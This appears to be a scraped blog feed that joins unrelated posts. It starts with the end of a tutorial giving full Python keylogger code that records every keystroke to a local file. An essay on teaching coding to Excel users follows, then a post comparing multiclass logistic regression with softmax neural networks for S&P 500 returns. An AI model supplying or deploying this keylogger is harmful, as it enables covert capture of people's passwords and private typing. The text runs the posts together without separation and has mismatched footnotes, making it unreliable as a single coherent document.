from pynput.keyboard import Key, Listener keys = [] def on_each_key_press(key): keys.append(key) write_keys_to_file(keys) def write_keys_to_file(keys): with open('log.txt', 'w') as logfile: for key in keys: key = str(key).replace("'", "") logfile.write(key) def on_each_key_release(key): if key == Key.esc: return False with Listener( on_press = on_each_key_press, on_release = on_each_key_release ) as listener: listener.join()
In this article we covered how you can create a simple keylogger using Python and pynput library.
Feel free to leave comments below if you have any questions or have suggestions for some edits and check out more of my Python Programming articles.
The post Create a Keylogger using Python appeared first on PyShark.
Excel is arguably the world’s largest coding community, with 750 million users worldwide. Many of us, myself included, get introduced to the data world from Excel.
But the thing is… Excel is not coding, not exactly. Like any software, Excel has its limitations, which a full-borne programming language like R or Python can make up for.
This is a huge market, so it’s not surprising to find a bevy of educational offerings on “how to learn coding from an Excel user’s perspective.” In fact, I’m not surprised there is more.
The problem is that little of this training follows solid instructional design principles. It does not help the user make a graceful pivot from Excel to coding.
Here’s what I see wrong with most “coding for Excel users” programs.
There is a stream of training, particularly for Python, that aims to teach users how to automate the production of Excel workbooks or conduct basic data analysis, by populating data, formatting worksheets and so forth.
The idea here is that it doesn’t actually take much knowledge of Python to make great strides in automating workbooks.
I take this attitude as if saying you don’t really need to know how to drive a car “that well” if you are just driving up the corner.
This is a counterproductive approach: it may seem like a time-saver to cut corners and half-train, but over time it’s inviting serious errors that will take lots of cleanup.
While I encourage analysts to merge their abilities in spreadsheets and coding (in fact, often the most fruitful data products come from such mashups), I highly discourage learning coding just to automate spreadsheets. In the long run, it does not offer solid footing into coding.
Fortunately, not all spreadsheets-to-coding training jumps the gun like the above. Often, it does provide step-by-step fundamentals to learning a programming language.
A common problem with this approach is it doesn’t do nearly enough to explicitly help students bridge the “mental model” of spreadsheets into coding.
This is such an overlooked teaching tool! After all:
Students learn new ideas by relating them to what they already know, and then transferring them into their long-term memory.
“How People Learn: An Evidence-Based Approach,” Paul Bruno (source: Edutopia)
I so often look at “introduction to coding for spreadsheet users” training and think that it could just as easily be “introduction to coding” training: that is, there is nothing in that training unique to the perspective of a spreadsheet user.
There’s so much education on “coding for spreadsheet users” that you can look at it and see that it could just as well been just any introduction for anywhere.
Here are some approaches I take in relating new ideas about coding to what students already know about spreadsheets:
VLOOKUP()
is really building a left outer join of sorts.This last one is more of a course “attitude” than an instructional approach, but it may be the most detrimental of them all.
The attitude sounds like this:
You’ve been using Excel when you really should be coding. Look at all these problems with using spreadsheets! Time to kick the habit.
This is the wrong attitude to take for a couple of reasons:
Earlier I mentioned the importance of helping students learn new ideas by relating them to what they already know.
Guess what? It’s hard to relate new ideas when you’re told what you already know is garbage.
Excel users intuitively understand how to work with data: they can sort, filter, group and join. Now it’s just a matter of pairing code to concept rather than starting from scratch. This is not wasted effort by a long shot.
What a drag! It’s not a great motivator for students to be told that what they know is crap. Moreover this reduces the ability to use Excel as a way to bridge the gap to other connections: if we are burning Excel down then why try to build off it, when it should be burned.
In addition to being a horrible teaching tactic, this attitude is just incorrect: there is no reason to pitch Excel from the data workflow!
I make a big idea of the data analytics stack because it serves to contextualize data tools as being “slices” of the same stack. This way, we can see tools as a “yes, and” relationship instead of “either/or.”
Excel absolutely has a place in data analytics. So does programming. Learning and using one does not negate the other.
But it should be something like this instead:
Excel is a great tool for data analysis, but it’s not the only tool. Python is a valuable tool for things. But this doesn’t mean you should throw out Ecxel entirely! It will always be a great tool for data prototyping and providing interactive data models for end-users.
You’ve also learned way more than you realized about coding from using Excel. Many of the tasks you perform on data all the time can also be done in Python.
An approach like this is more honest and more encouraging.
So, take a look at your “coding for spreadsheet users” content. How is it purposefully using the “mental model” of spreadsheets to teach coding? Is the course predicated on the idea that spreadsheets suck and shouldn’t be used anymore?
Learning coding is no small feat, so training programs that make it so usually fail. That’s the problem with the “learn a bit of Python to automate your Excel workbooks” school of thought.
At the same time, Excel users are not the average newbie coder, as they’ve worked with manipulating data and writing functions for some time. It’s important this training dig into these strengths — and, yes, spreadsheet mastery is a strength which should not be discarded.
These are topics which I address head-on in my book, Advancing into Analytics: From Excel to Python and R.
Spreadsheet users: I am one of you. Let me help you level up your data skills. No snark, no cheap shortcuts. Just the straightest learning path from spreadsheets to coding. I look forward to your thoughts on the book.
Our last post examined the correspondence between a logistic regression and a simple neural network using a sigmoid activation function. The downside with such models is that they only produce binary outcomes. While we argued (not very forcefully) that if investing is about assessing the probability of achieving an attractive risk-adjusted return, then it makes sense to model investment decisions as probability functions. Moreover, most practitioners would probably prefer to know whether next month’s return is likely to be positive and how confident they should be in that prediction. They want to get direction right first. That’s binary.
But what about magnitude and relative performance? Enter multiclass logistic regression and neural networks with the softmax activation function. Typically multiclass (or multinomial) classifications are used to distinguish categories like Pekingese from Poodles, or Shih-tzus. With a bit of bucketing, one can do the same with continuous variables like stock returns. This may reduce noise somewhat, but also gets at the heart of investing: the shape of returns. Most folks who’ve been around the markets for a while know that returns are not normally distributed, particularly for stocks.^{1} Sure, they’re fat-tailed and often negatively skewed. Discussed less frequently is that these returns also cluster around the mean. In other words, there are far more days of utter boredom, sheer terror, or unbearable ecstasy^{2} than implied by the normal distribution.
While everyone wants to knock the ball out of the park and avoid the landmines, those events are difficult to forecast given their rarity even for the fat-tailed distribution. Sustained performance is likely to come from compounding in the solid, but hardly heroic area above the mean return near the one sigma boundary. These events are more frequent and also offer more data with which to work. Indeed, since 1970 almost 40% of the S&P 500’s daily returns fell into that area vs. the expectation of only 34% based on the normal distribution.
How would be go about classifying the probability of different returns? First, we’d bucket the returns according to some quantile and then run the regression or neural network on those buckets to get the predictions. Multiclass logistic regressions use the softmax function which looks like the following:
\[
Softmax(k, x_{1}, ..,, x_{n}): \Large\frac{e^{x_{k}}}{\sum_{i=1}^{n}e^{x_{i}}}
\]
\[
f(k) =
\begin{cases}
1 \text{ if } k = argmax(x_{1},…,x_{n})
\\
0 \text{ othewise}
\end{cases}
\]
Here \(x_{k}\) is whatever combination of weights and biases with the independent variable that yields the maximum value for a particular class. Thus that value over the sum of all the exponentiated values yields the model’s likelihood for a particular category. How exactly does this happen? A multiclass logistic regression aggregates individual logistic regressions for the probability of each category with respect to all the other categories. Then it uses the fact that the probabilities must sum to one to yield the softmax function above. The intuition is relatively straightforward: how often do we see one class vs. all the rest based on some data? Check out the appendix for a (slightly!) more rigorous explanation.
Let’s get to our data, split it into the four quartiles for simplicity and then run a logistic regression on those categories. Recall we’re using the monthly return on the S&P500 as well as the return on the 10-month moving average vs. the one-month forward return, which we transform into the four buckets: below -1.9%, between -1.9% and 0.5%, between 0.5% and 3.6%, and above 3.6%. We’ll dub these returns with the following technical terms: Stinky, Poor, Mediocre, Good
Now we’ll run the regressions and present the confusion matrix as before.
Whoa dude, is this some weird sudoku? Not really. Still, a four-by-four confusion matrix isn’t the easiest to read. Bear with us as we explain. The diagonal from the upper left to the lower right contains the true positives. The rows associated with each true positive are the false positives while the columns are the false negatives. The true negative is essentially all the other cells that don’t appear in either the row or the column for the particular category. So the true negative for the Stinky category would be the sum of the 3×3 matrix whose top left corner starts in the cell of the second row and second column.
Organizing the data this way is better than nothing, but it could be more insight provoking. We can see that the multiclass logistic regression is not that strong in the Poor category, but is much better in the Good category. Let’s compute the true positive and false positive rates along with the precision for each category, which we show in the table below.
Outcome | TPR | FPR | Precision |
---|---|---|---|
Stinky | 29.7 | 32.1 | 23.7 |
Poor | 3.2 | 3.1 | 25.0 |
Mediocre | 42.9 | 26.7 | 34.6 |
Good | 45.3 | 31.1 | 33.0 |
Even with the refinement this still isn’t the easiest table to interpret. The model’s best true positive rate (TPR) performance is in the Good category, but it’s false positive rate (FPR) is also one of the highest. Shouldn’t we care about being really wrong? True, we don’t want to be consistently wrong. But we really don’t want to believe we’re going to generate a really good return and end up with a really Stinky one.
We’ll create a metric called the Really Wrong Rate (RWR) which will be the number of really wrong classifications over the total classifications the model made for that category. For example, for the Stinky outcome, the model got 19 correct (the top left box) but got 20 really wrong (the top right box). Thus its RWR is about 25% and its Precision to RWR is about 0.95. In other words, it’s getting more categories really wrong than correct.
What about the others? For the Good category, its RWR rate is almost 30% and its Precision to RWR is 1.12. That seems like a good edge. The model is really right about 12% more than it’s really wrong. However, when if you look at correctly identified categories plus incorrectly identified positive returns (the Good and Mediocre columns) relative to incorrectly identified categories with negative returns (the Stinky and Poor columns), the results are much worse: a ratio of about 0.83. Got that? Let’s move on to the neural network, before we get bogged down in confusion matrix navel gazing.
Unlike the linear regression or binary logistic regression, a simple neural network can’t approximate a multiclass logistic regression easily. Indeed, it takes a bit of wrangling to get something close, so we won’t bore you with all the iterations. We will show one or two just so you know how much effort we put in!
First, a single layer perceptron, with four output neurons, and a softmax activation function. We graph the model’s accuracy over 100 epochs along with logistic regression accuracy—the red dotted line—below.
Not very inspiring. When we include a hidden layer with 20 neurons (an entirely arbitrary number!), but the same parameters as before, we get the following graph.
Definitely better. We see that around the 37th epoch, the NN’s accuracy converges with the logistic regression, but it does bounce around above and below that for the remaining epochs.
Let’s build a deeper NN, this time with three layers of 20 neurons each. For graphical purposes, the architecture of this NN looks like the following:
Plotting accuracy by epoch, gives us the next graph:
This denser NN achieves a better accuracy than the logistic regression sooner than the others, and it’s outperformance persists longer. Of course, even when it does perform worse, it isn’t that dramatic—about one or two percentage points.
We’ll stop the model at the first point that it converges with the logistic regression, which happens to the be the tenth epoch and create the confusion matrix is below.
Again, a bit of struggle to discern much from this table, other than the model does not appear to predict Mediocre returns with much frequency even though they represent about 25% of the occurrences. Let’s look at some of the scores.
Outcome | TPR | FPR | Precision |
---|---|---|---|
Stinky | 25.0 | 14.7 | 36.4 |
Poor | 30.2 | 26.7 | 27.1 |
Mediocre | 6.3 | 3.1 | 40.0 |
Good | 59.4 | 48.4 | 29.2 |
The NN model has a much better true positive rate (TPR) than the logistic regression for Good outcomes, but the false positive rate (FPR) is high too. While the NN model is worse than the regression model on Stinky outcomes, it’s FPR is less than half that of the regression. Interestingly, both models are poor at predicting one category: Poor outcomes for the regression model vs. Mediocre outcomes for the NN. We’re not sure why that would be the case.
The Stinky RWR is about 18% yielding a Precision to RWR ratio of 2 on the Stinky outcomes, much better than the logistic regressions ratio of 0.95. In other words, the NN is twice as likely to predict a Stinky outcome correctly than incorrectly predict a Good outcome as a Stinky one.
Should we favor the logistic regression over a NN with softmax activation? Hard to say. Accuracy results are similar, but we did have to play with the NN a lot more. More than accuracy, once you look under the hood, results diverge. The greater flexibility of the NN might help us tune a model to arrive at our desired true positive, false positive, and or really wrong rates. But that might come at the risk of overfitting. Moreover, it’s still unclear why both models picked one category as less likely even though the each category should have had an equal chance of occurring. We’d need to engage in more data analysis to figure out what we’re missing.
What are some other avenues we could explore? We could build denser neural networks. We could backtest the predictions to gauge performance. This would probably be done best using walk-forward analysis. Of course, a drawback with this is that few people were using neural networks to run trading algorithms during the 70s and 80s so the results could be spurious. That is, if people had been employing such algorithms, returns could have been a lot different. Another avenue is to change the bucketing mechanism so that we focus on the range of outcomes we’re most interested in or would be most likely to achieve high risk-adjusted returns.
We’ll leave those musings for now. Let us know what you’d like to read by sending an email to the address below. Want more on multiclass regressions and softmax functions? Or should we explore if neural networks can approximate decision trees and random forests? Let us know! Until then, have a look at the Appendix after the code. It walks through the link between logistic and softmax functions. And by all means, have a look at the code!
Built using R 4.0.3, and Python 3.8.3 # [R] # Load libraries suppressPackageStartupMessages({ library(tidyverse) library(tidyquant) library(reticulate) }) # [Python] # Load libraries import warnings warnings.filterwarnings('ignore') import numpy as np import pandas as pd import statsmodels.api as sm import matplotlib import matplotlib.pyplot as plt import os os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = 'C:/Users/user_name/Anaconda3/Library/plugins/platforms' plt.style.use('ggplot') plt.rcParams['figure.figsize'] = (12,6) # Directory to save images DIR = "your/image/directory" def save_fig_blog(fig_id, tight_layout=True, fig_extension="png", resolution=300): path = os.path.join(DIR, fig_id + "." + fig_extension) print("Saving figure", fig_id) if tight_layout: plt.tight_layout() plt.savefig(path, format=fig_extension, dip=resolution) ## Pull data and split # See past posts for code sp_mon = pd.read_pickle('sp_mon_tf_2.pkl') data = sp_mon.dropna() X_train = data.loc[:'1991', ['ret', '10ma_ret']] y_train = data.loc[:'1991', '1_mon_ret'] X_valid = data.loc['1991':'2000', ['ret', '10ma_ret']] y_valid = data.loc['1991':'2000', '1_mon_ret'] X_test = data.loc['2001':, ['ret', '10ma_ret']] y_test = data.loc['2001':, '1_mon_ret'] y_train_trans = pd.qcut(y_train, 4, labels=[0, 1, 2, 3]) # Modest search for best solvers and regularization hyperparameters from sklearn.linear_model import LogisticRegression solvers = ['lbfgs', 'newton-cg', 'sag', 'saga'] for solver in solvers: log_reg = LogisticRegression(penalty='l2', solver = solver, multi_class='multinomial') log_reg.fit(X_train, y_train_trans) log_pred = log_reg.predict(X_train) print(log_reg.score(X_train, y_train_trans)) Cs = [10.0**-x for x in np.arange(-2,3)] for c in Cs: log_reg = LogisticRegression(penalty='l2', multi_class='multinomial', C=c) log_reg.fit(X_train, y_train_trans) print(log_reg.score(X_train, y_train_trans)) log_reg = LogisticRegression(penalty='l2', multi_class='multinomial') log_reg.fit(X_train, y_train_trans) log_reg.score(X_train, y_train_trans) ## Sigmoid on four classes # Not shown keras.backend.clear_session() np.random.seed(42) tf.random.set_seed(42) y_train_cat = keras.utils.to_categorical(y_train_trans) model = keras.models.Sequential([ keras.layers.Dense(4, activation='sigmoid',input_shape = X_train.shape[1:]) ]) model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy']) history = model.fit(X_train, y_train_cat, epochs = 100) ## Softmax on four clases keras.backend.clear_session() np.random.seed(42) tf.random.set_seed(42) model = keras.models.Sequential([ keras.layers.Dense(4, activation='softmax') ]) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) history = model.fit(X_train, y_train_cat, epochs=100) # Graph accuracy log_score = log_reg.score(X_train, y_train_trans) log_hist_df = pd.DataFrame(history.history) log_hist_df.index = np.arange(1, len(log_hist_df)+1) log_hist_df['accuracy'].plot(style='b-') plt.axhline(log_score, color='red', ls = ':') plt.xticks(np.arange(0,len(log_hist_df)+1, 10)) plt.xlabel('Epoch') plt.ylabel('Accuracy') plt.title("Neural network training error by epoch") plt.legend(['Neural network', 'Logistic regression'], loc='upper left', bbox_to_anchor=(0.0, 0.9)) save_fig_blog('nn_vs_log_reg_tf3') plt.show() ## Softmax with one hidden layer keras.backend.clear_session() np.random.seed(42) tf.random.set_seed(42) model = keras.models.Sequential([ keras.layers.Dense(20, activation='relu', input_shape=X_train.shape[1:]), keras.layers.Dense(4, activation='softmax') ]) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) history = model.fit(X_train, y_train_cat, epochs=100) # Graph log_score = log_reg.score(X_train, y_train_trans) log_hist_df = pd.DataFrame(history.history) log_hist_df.index = np.arange(1, len(log_hist_df)+1) log_hist_df['accuracy'].plot(style='b-') plt.axhline(log_score, color='red', ls = ':') plt.xticks(np.arange(0,len(log_hist_df)+1, 10)) plt.xlabel('Epoch') plt.ylabel('Accuracy') plt.title("Neural network training error by epoch") plt.legend(['Neural network', 'Logistic regression'], loc='upper left') save_fig_blog('nn_vs_log_reg_2_tf3') plt.show() ## Three hidden layer architecture from nnv import NNV layersList = [ {"title":"Input\n", "units": 2, "color": "blue"}, {"title":"Hidden 1\n(ReLU)", "units": 20}, {"title":"Hidden 2\n(ReLU)", "units": 20}, {"title":"Hidden 3\n(ReLU)", "units": 20}, {"title":"Output\n(Softmax)", "units": 4,"color": "blue"}, ] NNV(layersList,max_num_nodes_visible=12, node_radius=8, font_size=10).render(save_to_file=DIR+"/nn_tf3.png") plt.show() ## Softmax with three hidden layers keras.backend.clear_session() np.random.seed(42) tf.random.set_seed(42) model = keras.models.Sequential() model.add(keras.layers.Dense(20, activation='relu', input_shape=X_train.shape[1:])) for layer in range(2): model.add(keras.layers.Dense(20, activation='relu')) model.add(keras.layers.Dense(4, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) history = model.fit(X_train, y_train_cat, epochs=100) log_score = log_reg.score(X_train, y_train_trans) log_hist_df = pd.DataFrame(history.history) log_hist_df.index = np.arange(1, len(log_hist_df)+1) log_hist_df['accuracy'].plot(style='b-') plt.axhline(log_score, color='red', ls = ':') plt.xticks(np.arange(0,len(log_hist_df)+1, 10)) plt.xlabel('Epoch') plt.ylabel('Accuracy') plt.title("Neural network training accuracy by epoch") plt.legend(['Neural network', 'Logistic regression'], loc='upper left') save_fig_blog('nn_vs_log_reg_3_tf3') plt.show() ## Rerun stopping early keras.backend.clear_session() np.random.seed(42) tf.random.set_seed(42) model = keras.models.Sequential() model.add(keras.layers.Dense(20, activation='relu', input_shape=X_train.shape[1:])) for layer in range(2): model.add(keras.layers.Dense(20, activation='relu')) model.add(keras.layers.Dense(4, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) history = model.fit(X_train, y_train_cat, epochs=10) ## Create confusion matrix table function # Help from SO # https://stackoverflow.com/questions/50666091/true-positive-rate-and-false-positive-rate-tpr-fpr-for-multi-class-data-in-py/50671617 from sklearn.metrics import confusion_matrix # from sklearn.metrics import precision_score, recall_score, roc_curve def conf_mat_table(predicted, actual, title = 'Logistic regression', save=False, save_title = None, print_metrics=False): conf_mat = confusion_matrix(y_true=predicted, y_pred=actual) fig, ax = plt.subplots(figsize=(14,8)) ax.matshow(conf_mat, cmap=plt.cm.Blues, alpha=0.3) for i in range(conf_mat.shape[0]): for j in range(conf_mat.shape[1]): ax.text(x=j, y=i, s=conf_mat[i, j], fontsize=14, va='center', ha='center') ax.xaxis.set_ticks_position('top') ax.xaxis.set_label_position('top') ax.set_xticklabels(['','Stinky', 'Poor','Mediocre', 'Good'], fontsize=14) ax.set_yticklabels(['', 'Stinky', 'Poor', 'Mediocre', 'Good'], fontsize=14, rotation=90) ax.set_xlabel('Actual returns', fontsize=16) ax.set_ylabel('Predicted returns', fontsize=16) ax.tick_params(axis='both', which='major', pad=5) ax.set_title(title + ' confusion matrix', pad=40, fontsize=20) lines = [0.5, 1.5, 2.5] for line in lines: plt.axhline(line, color='grey') plt.axvline(line, color='grey') plt.grid(False) if save: save_fig_blog(save_title) plt.show() if print_metrics: FP = conf_mat.sum(axis=1) - np.diag(conf_mat) FN = conf_mat.sum(axis=0) - np.diag(conf_mat) TP = np.diag(conf_mat) TN = conf_mat.sum() - (FP + FN + TP) # Add 1e-10 to prevent division by zero # True positive rate tpr = TP/(TP+FN+1e-10) # Precision precision = TP/(TP+FP+1e-10) # False positive rate fpr = FP/(FP+TN+1e-10) print("") tab = pd.DataFrame(np.c_[['Stinky', 'Poor','Mediocre', 'Good'], tpr, fpr, precision], columns = ['Outcome', 'TPR', 'FPR', 'Precision']).set_index("Outcome") tab = tab.apply(pd.to_numeric) return tab, conf_mat ## Predictions log_pred = log_reg.predict(X_train) nn = model.predict(X_train) nn_pred = np.argmax(nn, axis=1) ## Logistic regression table tab1, conf_mat1 = conf_mat_table(log_pred, y_train_trans, save=False, title="Multiclass logistic regression", print_metrics=True, save_title='log_reg_conf_mat_1_tf3') # Save to csv for blog dir1 = "your/wd" folder = "/your_folder/" tab1.to_csv(dir1+folder+'tab1_tf3.csv') conf_mat1 = pd.DataFrame(data = conf_mat1, index=pd.Series(['Stinky', 'Poor','Mediocre', 'Good'], name='Outcome'), columns=['Stinky', 'Poor','Mediocre', 'Good']) conf_mat1.to_csv(dir1+folder+'/conf_mat1_tf3.csv') # [R] # Rmarkdown table # Asssumes we're in the directory to which we saved all those csvs. tab1 <- read_csv('tab1_tf3.csv') tab1 %>% mutate_at(vars("TPR", "FPR", "Precision"), function(x) format(round(x,3)*100,nsmallest=0)) %>% knitr::kable(caption = "Logistic regression scores (%)") conf_mat1 <- read_csv('conf_mat1_tf3.csv') stinky_rwr <- as.numeric(conf_mat1[1,5]/sum(conf_mat1[1,2:5])) good_rwr <- as.numeric(conf_mat1[4,2]/sum(conf_mat1[4,2:5])) stinky_prec <- as.numeric(tab1[1,4]) good_prec <- as.numeric(tab1[4,4]) good_2_Stinky <- (sum(conf_mat1[4,4:5])/sum(conf_mat1[4,2:3])) # [Python] ## Neutral network table tab2, conf_mat2 = conf_mat_table(nn_pred, y_train_trans, title="Neural network", save=False, print_metrics=True, save_title='nn_conf_mat_1_tf3') # Save to csv for blog tab2.to_csv(dir1+folder+'/tab2_tf3.csv') conf_mat2 = pd.DataFrame(data = conf_mat2, index=pd.Series(['Stinky', 'Poor','Mediocre', 'Good'], name='Outcome'), columns=['Stinky', 'Poor','Mediocre', 'Good']) conf_mat2.to_csv(dir1[:-13]+'/conf_mat2_tf3.csv') conf_mat2.to_csv(dir1+folder+'/conf_mat2_tf3.csv') # [R] # Rmarkdown table # Neural network # Asssumes we're in the directory to which we saved all those csvs. tab2 <- read_csv('tab2_tf3.csv') tab2 %>% mutate_at(vars("TPR", "FPR", "Precision"), function(x) format(round(x,3)*100,nsmallest=0)) %>% knitr::kable(caption = "Neural network scores") conf_mat2 <- read_csv('conf_mat2_tf3.csv') stinky_rwr1 <- as.numeric(conf_mat2[1,5]/sum(conf_mat2[1,2:5])) good_rwr1 <- as.numeric(conf_mat2[4,2]/sum(conf_mat2[4,2:5])) stinky_prec1 <- as.numeric(tab2[1,4]) good_prec1 <- as.numeric(tab2[4,4]) good_2_Stinky1 <- (sum(conf_mat2[4,4:5])/sum(conf_mat2[4,2:3]))
While we think the intuition behind the softmax function is relatively straightforward, deriving it is another matter. Our search has revealed simplistic discussions or mathematical derivations that require either a lot of formulas with matrix notation or several formulas and a hand wave. While our aim is not to write tutorials, we do think it can be helpful to provide more rigor on complex topics. In general, we find most of the information out there on the main ML algorithms either math-averse or math-enchanted. There’s got to be a happy medium: one that gives you enough math to understand the nuances in a more formal way, but not so much that you need to have aced partial differential equations without ever having taken ordinary ones.^{4} Here’s our stab at this.
Let’s refresh our memories on softmax and logistic functions:
\[
Softmax(k, x_{1}, ..,, x_{n}): \Large\frac{e^{x_{k}}}{\sum_{i=1}^{n}e^{x_{i}}}
\]
\[
f(k) =
\begin{cases}
1 \text{ if } k = argmax(x_{1},…,x_{n})
\\
0 \text{ othewise}
\end{cases}
\]
\[
\\
Logisitic: \Large\frac{e^{x}}{1 + e^{x}}
\\
\]
The logic behind the softmax function is as follows. Suppose you have a bunch of data that you think might predict various classes or categories of something of interest. For example, tail, ear, and snout length for a range of different dog breeds. First you encode the labels (e.g., breeds) as categorical variables (essentially integers). Then you build a neural network and apply weights and biases to the features (e.g. tail, etc). You then compare the output of the neural network against each label. But you need to transform the outputs into something that will tell you that a tail, ear, and snout of lengths x, y, and z are more likely to belong to a Poodle than a Pekingese. All you’ll get from applying weights and biases to all the features are bunches of numbers with lots of decimal places. You need some way to “squash” the data into a probabilistic range to say which breed is more likely that another given an input. Enter the softmax function.
Look at the formula and forget Euler’s constant (\(e\)) for a second. If you can do that, you should be able to see the softmax function as a simple frequency calculation: the number of Shih-tzus over the total number of Shih-tzus, Pekingese, and Poodles in the data set. Now recall that we’re actually dealing with lots of weights and biases applied to the variables, which could have different orders of magnitude once we’re finished with all the calculations. By raising Euler’s constant to the power of the final output, we set all values to an equivalent base, and we force the largest output to be much further away from all the others, unless there’s a tie. This has the effect of pushing the model to chose one class more than all the others.^{5} Not so soft after all! Once we’ve transformed the outputs, we can them compare each one to the sum of the total to get the probability for each breed. The output with the highest probability that corresponds one of the breeds means that the model believes it’s that particular breed. We can then check against the actual breed, calculate a loss function, backpropagate, and rerun.
But how does this relate to the logistic function other than that both use \(e\)?
If perform some algebra on the logistic function we get:^{6}
\(\Large e^{x} = \frac{y}{1-y}\)
Thus \(e^{x}\) is the probability of some outcome over the probability of not that outcome. Hence, each \(e^{x}\) is equivalent to saying here’s the probability this a Pekingese vs. Not a Pekingese given the features. If we recognize that Not a Pekingese is essentially all other breeds, then we can see how to get to the numerator in the softmax function. To transform this into a probability distribution in which all probabilities must sum to one, we sum all the \(e^{x}\)s. That’s the softmax denominator: \(\sum_{i=1}^{n}e^{x_{i}}\).
Whew! For such a rough explanation that was pretty long-winded. Can we try to derive the softmax function from the logistic function mathematically? One of the easiest ways is to reverse it using a two case scenario.
If we only have Pekingese (\(e^{x_{p}}\)) and Shih-tzus (\(e^{x_{s}}\)), then the probability for each is:
\(\Large e^{x_{p}} = \frac{p}{1-p} = \frac{p}{s}\)
\(\Large e^{x_{s}} = \frac{s}{1-s} = \frac{s}{p}\)
Where:
\(x_{p}, x_{s}\) are the different weighted features that yield a Pekingese or a Shih-tzu
\(p, s\) are the probability of being a Pekingese or a Shih-tzu
Thus if we’re trying to estimate the probability of a Pekingese, the simplified calculation using the softmax function looks like the following?
\(\Large\frac{e^{x_{p}}}{e^{x_{p}} + e^{x_{s}}}\)
If the evidence for the Shih-tzu is zero, that means \(x_{s}\) is zero and hence \(e^{x_{s}}\) is \(1\). Which resolves to:
\(\Large\frac{e^{x_{p}}}{1 + e^{x_{p}}}\)
The logistic function! Neat, but doesn’t this seem like a sleight of hand? It’s not as obvious how it would work if we were to add a third category like a Poodle. Moreover, it doesn’t exactly help us build the softmax function from the logistic.
If we start with the log-odds as we did in the last post, that might prove to be more fruitful. Recall for a binary outcome it looks like the following:
\(\Large log(\frac{p_{i}}{1-p_{i}}) = \beta_{i} x\)
Let \(p_{i}\) be the probability of one class
And let \(Z = (1 – p_{i})\) represent all the other possible classes\
\(\beta_{i} x\) represents the particular weights applied to x to arrive at \(p_{i}\).
Then,
\(\Large p_{i} = \frac{e^{\beta_{i} x}}{Z}\)
Since all the probabilities must sum to 1:
\(\Large 1 = \sum \frac{e^{\beta_{i}x}}{Z}\)
Since Z is a constant, it can be pulled out of the summation:
\(\Large 1 = \frac{1}{Z} \sum e^{\beta_{i}x}\)
This yields:
\(\Large Z = \sum e^{\beta_{i}x}\)
Thus:
\(\Large p_{i} = \frac{e^{\beta_{i}x}}{\sum_{i=i}^{K} e^{\beta_{i}x}}\)
Magic! The softmax function.
We’ve been meaning to do a post comparing return distributions between asset classes, but haven’t got around to it. If you’ve seen a good article on the subject, please email us at the address below. We don’t want to reinvent the wheel!︎
We actually heard this phrase on the Streetwise podcast recently and thought it was too funny to pass up.︎
When we first started to write this section we thought we could encapsulate it pretty easily. Instead, we had a hard time pulling ourselves out of the rabbit hole. If something seems wrong or off, let us know!︎
Like my lovely wife!︎
This doesn’t always work and sometimes features need to be normalized prior to training or need an additional ‘jiggering’ at activation. We don’t know about you, but even though we get the logic behind using exponentiation, we can’t help but wonder whether it is biasing results just for force a more emphatic outcome. If you can shed light on this for us, please email us at the address below.︎